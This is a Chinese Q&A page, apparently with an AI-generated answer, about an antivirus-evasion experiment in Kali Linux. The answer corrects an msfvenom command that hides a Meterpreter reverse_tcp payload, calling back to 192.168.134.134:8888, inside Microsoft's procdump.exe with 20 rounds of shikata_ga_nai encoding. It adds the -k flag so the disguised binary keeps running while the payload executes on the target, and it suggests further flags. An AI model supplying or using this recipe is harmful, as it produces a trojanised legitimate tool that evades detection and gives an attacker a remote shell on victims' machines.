在kali Linux中进行msf免杀实验时,使用测试编码并绑定微软官方工具procdump,使用官方procdump做实验 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168. 134.134 LPORT=8888 -e x86/shikata_ga_nai -x procdump.exe -i 20 -f exe -o flash3.exe应该怎么改
时间: 2023-06-11 09:07:07 浏览: 235
kali-linux-wireless-pentest_kali使用指南_productg6t_kali_kali-linux-
如果你想进行msf免杀实验,并使用procdump.exe作为载体来绑定恶意代码,可以使用以下命令:
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.134.134 LPORT=8888 -x procdump.exe -k -e x86/shikata_ga_nai -i 20 -f exe -o flash3.exe
```
其中,`-k`参数用于保持进程执行,直到meterpreter session被开启。这个参数在绑定时非常重要,因为它确保了procdump.exe进程继续执行,而不会在绑定后立即停止。这样可以确保你的payload成功植入目标机器并得到执行。
你还可以尝试其他的msfvenom参数,以便更好地适应你的实验环境和目标机器。例如,你可以使用msfvenom的`-b`参数来指定bad characters,也可以使用`-a`参数来指定目标机器的架构。请根据需要进行更改。
阅读全文